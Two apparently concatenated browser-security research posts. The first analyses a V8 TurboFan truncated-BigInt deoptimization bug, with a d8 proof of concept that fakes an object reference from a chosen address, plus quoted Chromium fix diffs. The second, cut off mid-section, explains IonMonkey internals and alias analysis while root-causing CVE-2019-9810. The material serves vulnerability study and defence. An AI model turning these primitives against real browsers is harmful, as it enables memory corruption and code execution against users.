let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var obj = {};
    obj[x] = y;
    return obj;
  }
  catch(_){ return y}
}

function compileOnce() {
  f("foo");
  %PrepareFunctionForOptimization(f);
  f("foo");
  f("foo");
  f("foo");
  f("foo");
  %OptimizeFunctionOnNextCall(f);
  f("foo");
  return f("boom"); // deopt reason : wrong name
}

To experiment, we simulate the infoleak primitive by using the runtime function %DebugPrint, and we add an ArrayBuffer to the object. That should not be possible since the JavaScript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
d8> setAddress(0x003d5ef8ab79)
undefined
d8> var badobj = compileOnce()
undefined
d8> %DebugPrint(badobj)
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
d8> badobj.boom
[object ArrayBuffer]

Et voila! Sweet as!

Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1936468
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#65173}
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
   void VisitObjectState(Node* node) {
     if (propagate()) {
       for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
       }
     } else if (lower()) {
       Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
         Node* input = node->InputAt(i);
         (*types)[i] =
             DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
       }
       NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
                                          ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);

Interestingly, other bugs in the representation changer were triggered by very similar PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1962278
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#65434}
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
     }
   }

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
   switch (use_info.representation()) {
     case MachineRepresentation::kTaggedSigned:
       DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}

An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits, no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!

An interesting fact to point out is that none of those PoCs would actually execute correctly: they trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan, which ends up optimizing 'invalid' code.
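
For illustration, a call shape reaching that reducer could look like the hypothetical sketch below; consistent with the remark above, the call itself throws a TypeError at runtime, so it has to be wrapped in a try/catch:

function trigger() {
  try {
    // Value argument omitted: during inlining, the reducer would query
    // an input that doesn't exist. At runtime this throws a TypeError.
    return BigInt.asUintN(64);
  } catch (_) {}
}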

Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this:

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11

However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values:

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11

As described in the design document, a compressed pointer corresponds to the lower 32 bits of a pointer, to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
 - map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
 - prototype: 0x16a408248f25 <JSArray[0]>
 - elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
 - length: 4
 - properties: 0x16a4080406e1 <FixedArray[0]> {
    #length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x16a4080c5f71 <FixedArray[4]> {
           0: 1
           1: 2
           2: 3
           3: 4
 }

If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008

To get the full address, we need to know the base.

(lldb) register read r13
     r13 = 0x000016a400000000

And we can manually decompress a pointer by computing base + compressed_pointer (and obviously we subtract 1 to untag the pointer).

(lldb) x/10wx $r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a

Because Smis are now stored on 32 bits with the lsb set to 0 (even on a 64-bit build), we need to shift their raw value right by one to read them.
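
Putting the two rules together, with the exact values observed in the lldb session above (BigInt arithmetic is used here just to mimic 64-bit pointer math):

// Decompress the elements pointer: base (r13) + compressed value, then
// subtract the 0b01 HeapObject tag; decode the first Smi element (shift by 1).
const base = 0x16a400000000n;
const elements = base + 0x080c5f71n - 1n;
console.log(elements.toString(16)); // 16a4080c5f70, as dumped above
console.log(0x00000002 >> 1);       // 1 -> a[0]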

Also, raw pointers are supported. An example of a raw pointer is the backing store pointer of an array buffer.

d8> var a = new ArrayBuffer(0x40); 
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
 - map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
 - elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0x107314fd0
 - byte_length: 64
 - detachable
 - properties: 0x16a4080406e1 <FixedArray[0]> {}
 - embedder fields = {
    0, aligned pointer: 0x0
    0, aligned pointer: 0x0
 }
(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000

We indeed find the full raw pointer in memory (raw | 00).

(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000

Conclusion

We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms.

However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).

Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine!

Please feel free to contact me on twitter if you've got any feedback or question!

Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity)


A journey into IonMonkey: root-causing CVE-2019-9810.

Introduction

In May, I wanted to play with BigInts and evaluate how I could use them for browser exploitation. The exploit I wrote for the blazefox relied on a Javascript library developed by @5aelo that allows code to manipulate 64-bit integers. Around the same time, ZDI released a PoC for CVE-2019-9810, which is an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own 2019 to compromise Mozilla's web-browser.

This was the perfect occasion to write an exploit and add BigInt support in my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810.

Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root-cause of the issue and unwinding this sounded like a nice exercise. This is basically what this blogpost is about, me exploring Ion's code-base and investigating the root-cause of CVE-2019-9810.

The title of the issue, "IonMonkey MArraySlice has incorrect alias information", seems to suggest that the root of the issue concerns some alias information, and the fix also points at Ion's AliasAnalysis optimization pass.

Before starting, if you guys want to follow the source-code at home without downloading the whole of Spidermonkey's / Firefox's source-code, I have set up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn and as a result some of the functions I mention below can appear under a slightly different name in the latest available version.

All right, buckle up and enjoy the read!


Speculative optimizing JIT compiler

This part is not really meant to introduce what optimizing speculative JIT engines are in detail, but instead to give you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to follow what is to come.

For the people that have never heard about JIT (just-in-time) engines: this is a piece of software that is able to turn managed code into native code as it runs. This has historically been used by interpreted languages to produce faster code, as running assembly is faster than interpreting bytecode in a software CPU. With that in mind, this is what Javascript bytecode looks like in Spidermonkey:

js> function f(a, b) { return a+b; }
js> dis(f)
flags: CONSTRUCTOR
loc     op
-----   --
main:
00000:  getarg 0                        #
00003:  getarg 1                        #
00006:  add                             #
00007:  return                          #
00008:  retrval                         # !!! UNREACHABLE !!!

Source notes:
 ofs line    pc  delta desc     args
---- ---- ----- ------ -------- ------
  0:    1     0 [   0] colspan 19
  2:    1     0 [   0] step-sep
  3:    1     0 [   0] breakpoint
  4:    1     7 [   7] colspan 12
  6:    1     8 [   1] breakpoint

Now, generating assembly is one thing, but the JIT engine can be more advanced and apply a bunch of program analyses to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else. Well, the JIT engine might be able to prove that it is safe not to do any bounds check on the index, in which case it can remove it. Another easy example to reason about is an object constructed in a loop body that doesn't depend on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, why construct it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function as above:

0:000> u . l20
000003ad`d5d09231 cc              int     3
000003ad`d5d09232 8b442428        mov     eax,dword ptr [rsp+28h]
000003ad`d5d09236 8b4c2430        mov     ecx,dword ptr [rsp+30h]
000003ad`d5d0923a 03c1            add     eax,ecx
000003ad`d5d0923c 0f802f000000    jo      000003ad`d5d09271
000003ad`d5d09242 48b9000000000080f8ff mov rcx,0FFF8800000000000h
000003ad`d5d0924c 480bc8          or      rcx,rax
000003ad`d5d0924f c3              ret

000003ad`d5d09271 2bc1            sub     eax,ecx
000003ad`d5d09273 e900000000      jmp     000003ad`d5d09278
000003ad`d5d09278 6a0d            push    0Dh
000003ad`d5d0927a e900000000      jmp     000003ad`d5d0927f
000003ad`d5d0927f 6a00            push    0
000003ad`d5d09281 e99a6effff      jmp     000003ad`d5d00120 <- bailout

OK, so that covers the optimizing JIT part, but what about the speculative part? If you think about it for a minute or two, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the objects you are dealing with, and this information is hard to get in dynamically-typed languages because, by design, the type of a variable changes across the program execution. Now, obviously the engine cannot speculate randomly about types; instead, what engines usually do is introspect the program at runtime and observe what is going on. If a function has been invoked many times and every time it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function, it inserts a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together, for example. So if the engine encounters a case where the speculation doesn't hold anymore, it can toss the code it generated and fall back to executing the code in the interpreter (called a deoptimization bailout), resulting in a performance hit.
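
As a quick illustration (a hypothetical snippet, not taken from the case study), this is the kind of pattern that triggers speculation and then a bailout:

function add(a, b) { return a + b; }

// Warm up with integers only: the engine speculates on Int32 operands
// and compiles an optimized version guarded by type checks.
for (let i = 0; i < 100000; i++) add(i, 1);

// The guard fails on string operands: deoptimization bailout, and
// execution falls back to less optimized code.
add("no longer", " an integer");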

From bytecode to optimized assembly

As you can imagine, the process of analyzing the program, running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you execute a function, let's say, a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to identify hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).

  // Force how many invocation or loop iterations are needed before compiling
  // a function with the highest ionmonkey optimization level.
  // (i.e. OptimizationLevel_Normal)
  const char* forcedDefaultIonWarmUpThresholdEnv =
      "JIT_OPTION_forcedDefaultIonWarmUpThreshold";
  if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) {
    Maybe<int> value = ParseInt(env);
    if (value.isSome()) {
      forcedDefaultIonWarmUpThreshold.emplace(value.ref());
    } else {
      Warn(forcedDefaultIonWarmUpThresholdEnv, env);
    }
  }

  // From the Javascript shell source-code
  int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold");
  if (warmUpThreshold >= 0) {
    jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold);
  }

On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses on Ion, which is the fastest/most expensive tier of JIT in Spidermonkey.

Here is an overview of the whole pipeline (picture taken from Mozilla’s wiki):

ionmonkey overview

OK, so in Spidermonkey the way it works is that the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion, and Ion converts it to another representation which is the Middle-level Intermediate Representation (abbreviated MIR later). This is a pretty simple IR which uses Static Single Assignment form and has about 300 instructions. The MIR instructions are organized into basic blocks which themselves form a control-flow graph.

Ion's optimization pipeline is composed of 29 steps: certain steps actually modify the MIR graph by removing or shuffling nodes, and others don't modify it at all (they just analyze it and produce results consumed by later passes). To debug Ion, I recommend adding the below to your mozconfig file:

ac_add_options --enable-jitspew

This basically turns on a bunch of macros in the Spidermonkey code-base that are used to spew debugging information to the standard output. The debugging infrastructure is not nearly as nice as Turbolizer, but we will make do with the tools we have. The JIT subsystem defines a number of channels where it can output spew, and the user can turn any of them on or off. This is pretty useful if you want to debug a single optimization pass, for example.

// New channels may be added below.
#define JITSPEW_CHANNEL_LIST(_)            \
  /* Information during sinking */         \
  _(Prune)                                 \
  /* Information during escape analysis */ \
  _(Escape)                                \
  /* Information during alias analysis */  \
  _(Alias)                                 \
  /* Information during alias analysis */  \
  _(AliasSummaries)                        \
  /* Information during GVN */             \
  _(GVN)                                   \
  /* Information during sincos */          \
  _(Sincos)                                \
  /* Information during sinking */         \
  _(Sink)                                  \
  /* Information during Range analysis */  \
  _(Range)                                 \
  /* Information during LICM */            \
  _(LICM)                                  \
  /* Info about fold linear constants */   \
  _(FLAC)                                  \
  /* Effective address analysis info */    \
  _(EAA)                                   \
  /* Information during regalloc */        \
  _(RegAlloc)                              \
  /* Information during inlining */        \
  _(Inlining)                              \
  /* Information during codegen */         \
  _(Codegen)                               \
  /* Debug info about safepoints */        \
  _(Safepoints)                            \
  /* Debug info about Pools*/              \
  _(Pools)                                 \
  /* Profiling-related information */      \
  _(Profiling)                             \
  /* Information of tracked opt strats */  \
  _(OptimizationTracking)                  \
  _(OptimizationTrackingExtended)          \
  /* Debug info about the I$ */            \
  _(CacheFlush)                            \
  /* Output a list of MIR expressions */   \
  _(MIRExpressions)                        \
  /* Print control flow graph */           \
  _(CFG)                                   \
                                           \
  /* BASELINE COMPILER SPEW */             \
                                           \
  /* Aborting Script Compilation. */       \
  _(BaselineAbort)                         \
  /* Script Compilation. */                \
  _(BaselineScripts)                       \
  /* Detailed op-specific spew. */         \
  _(BaselineOp)                            \
  /* Inline caches. */                     \
  _(BaselineIC)                            \
  /* Inline cache fallbacks. */            \
  _(BaselineICFallback)                    \
  /* OSR from Baseline => Ion. */          \
  _(BaselineOSR)                           \
  /* Bailouts. */                          \
  _(BaselineBailouts)                      \
  /* Debug Mode On Stack Recompile . */    \
  _(BaselineDebugModeOSR)                  \
                                           \
  /* ION COMPILER SPEW */                  \
                                           \
  /* Used to abort SSA construction */     \
  _(IonAbort)                              \
  /* Information about compiled scripts */ \
  _(IonScripts)                            \
  /* Info about failing to log script */   \
  _(IonSyncLogs)                           \
  /* Information during MIR building */    \
  _(IonMIR)                                \
  /* Information during bailouts */        \
  _(IonBailouts)                           \
  /* Information during OSI */             \
  _(IonInvalidate)                         \
  /* Debug info about snapshots */         \
  _(IonSnapshots)                          \
  /* Generated inline cache stubs */       \
  _(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
  JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
      JitSpew_Terminator
};

In order to turn those channels on, you need to define an environment variable called IONFLAGS containing a comma-separated string with all the channels you want enabled: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don't quite match the macros above, so you can find all the names below:

static void PrintHelpAndExit(int status = 0) {
  fflush(nullptr);
  printf(
      "\n"
      "usage: IONFLAGS=option,option,option,... where options can be:\n"
      "\n"
      "  aborts        Compilation abort messages\n"
      "  scripts       Compiled scripts\n"
      "  mir           MIR information\n"
      "  prune         Prune unused branches\n"
      "  escape        Escape analysis\n"
      "  alias         Alias analysis\n"
      "  alias-sum     Alias analysis: shows summaries for every block\n"
      "  gvn           Global Value Numbering\n"
      "  licm          Loop invariant code motion\n"
      "  flac          Fold linear arithmetic constants\n"
      "  eaa           Effective address analysis\n"
      "  sincos        Replace sin/cos by sincos\n"
      "  sink          Sink transformation\n"
      "  regalloc      Register allocation\n"
      "  inline        Inlining\n"
      "  snapshots     Snapshot information\n"
      "  codegen       Native code generation\n"
      "  bailouts      Bailouts\n"
      "  caches        Inline caches\n"
      "  osi           Invalidation\n"
      "  safepoints    Safepoints\n"
      "  pools         Literal Pools (ARM only for now)\n"
      "  cacheflush    Instruction Cache flushes (ARM only for now)\n"
      "  range         Range Analysis\n"
      "  logs          JSON visualization logging\n"
      "  logs-sync     Same as logs, but flushes between each pass (sync. "
      "compiled functions only).\n"
      "  profiling     Profiling-related information\n"
      "  trackopts     Optimization tracking information gathered by the "
      "Gecko profiler. "
      "(Note: call enableGeckoProfiling() in your script to enable it).\n"
      "  trackopts-ext Encoding information about optimization tracking\n"
      "  dump-mir-expr Dump the MIR expressions\n"
      "  cfg           Control flow graph generation\n"
      "  all           Everything\n"
      "\n"
      "  bl-aborts     Baseline compiler abort messages\n"
      "  bl-scripts    Baseline script-compilation\n"
      "  bl-op         Baseline compiler detailed op-specific messages\n"
      "  bl-ic         Baseline inline-cache messages\n"
      "  bl-ic-fb      Baseline IC fallback stub messages\n"
      "  bl-osr        Baseline IC OSR messages\n"
      "  bl-bails      Baseline bailouts\n"
      "  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
      "  bl-all        All baseline spew\n"
      "\n"
      "See also SPEW=help for information on the Structured Spewer."
      "\n");
  exit(status);
}

An important channel is logs, which tells the compiler to output an ion.json file (in /tmp on Linux) packing a ton of information gathered throughout the pipeline and optimization process. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py, but I personally use ghetto-iongraph.py to directly render the graphviz graph into SVG in the browser, whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the passes directly from the browser, which I find more convenient than navigating through a bunch of PNG files:

ghetto-iongraph

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite

Reading MIR code is not too bad, you just have to know a few things:

  1. Every instruction is an object
  2. Each instruction can have operands that can be the result of a previous instruction
10 | add unbox8:Int32 unbox9:Int32 [int32]
  3. Every instruction is identified by an identifier, which is an integer starting from 0
  4. There are no variable names; to reference the result of a previous instruction, a name is created by concatenating the name of the instruction with its identifier, like unbox8 and unbox9 above. Those reference the two unbox instructions identified by 8 and 9:
08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)

That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engines but the concepts are usually the same):

Let's have a look at alias analysis now :)

Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass, which is the specific optimization pass that was fixed by Mozilla. To understand it a bit more, we will simply take small snippets of Javascript, observe the results in a debugger, and follow the source-code along. We will get back to the vulnerability a bit later, when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
    const a = [1,2,3,4];
    a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
    x();
}

Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32

The alias analysis is able to output a summary on the alias-sum channel, and this is what it prints out when run against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29

OK, so that's kind of a lot for now, so let's start at the beginning. Ion uses what they call alias sets. You can see an alias set as an equivalence set (a term also used in the compiler literature). Everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that's all it cares about. Alias information is used later in the pipeline to carry out optimizations such as redundancy elimination, for example - more on that later.
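
To see why load/store dependencies matter, consider a hypothetical function like the one below: whether the second length load can be eliminated depends entirely on whether the store in between may alias it.

function f(a, b) {
  const x = a.length; // load
  b[0] = 1337;        // store: may it alias a.length?
  const y = a.length; // redundant (and removable) only if the store
                      // above cannot alias this load
  return x + y;
}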

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.

In Ion, instructions are free to refine their alias set by overloading getAliasSet; here are the alias sets defined by each of the MIR opcodes we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
  AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
  // NewArray is marked as non-effectful because all our allocations are
  // either lazy when we are using "new Array(length)" or bounded by the
  // script or the stack size when we are using "new Array(...)" or "[...]"
  // notations.  So we might have to allocate the array twice if we bail
  // during the computation of the first element of the square braket
  // notation.
  virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Store a value to a dense array slots vector.
class MStoreElement
    : public MTernaryInstruction,
      public MStoreElementCommon,
      public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element);
  }
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
                              public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::ObjectFields);
  }
};

// Load the array length from an elements header.
class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Load(AliasSet::ObjectFields);
  }
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
                    public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
                                     UnboxedInt32Policy<2>>::Data {
  AliasSet getAliasSet() const override {
    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
  }
};

The analyze function ignores instructions that have no alias set, as you can see below...

    for (MInstructionIterator def(block->begin()),
         end(block->begin(block->lastIns()));
         def != end; ++def) {
      def->setId(newId++);
      AliasSet set = def->getAliasSet();
      if (set.isNone()) {
        continue;
      }

...so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
